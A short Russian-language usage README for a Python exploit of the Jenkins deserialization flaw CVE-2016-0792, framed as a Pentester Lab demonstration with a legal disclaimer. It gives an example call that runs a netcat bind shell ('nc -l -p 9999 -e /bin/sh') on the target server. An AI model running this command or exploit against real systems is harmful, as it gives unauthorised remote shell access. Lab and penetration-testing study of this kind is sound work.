
Эксплойт для уязвимости сериализации Jenkins - CVE-2016-0792
https://www.exploit-db.com/exploits/42394/
Python 3.6.x
Для работы этого эксплойта требуется библиотека requests
sudo pip install requests
python3
from exploit import exploit
exploit(url, command)
Где url - это URL-адрес сервера Jenkins, а command - команда для выполнения
exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')
Это запустит nc и будет прослушивать порт 9999 на уязвимой машине
Для демонстрации я буду использовать ISO от Pentester Lab
Использование этого программного обеспечения для атаки на цели без разрешения незаконно. Я не несу ответственности за любой ущерб, причиненный использованием этого программного обеспечения против закона.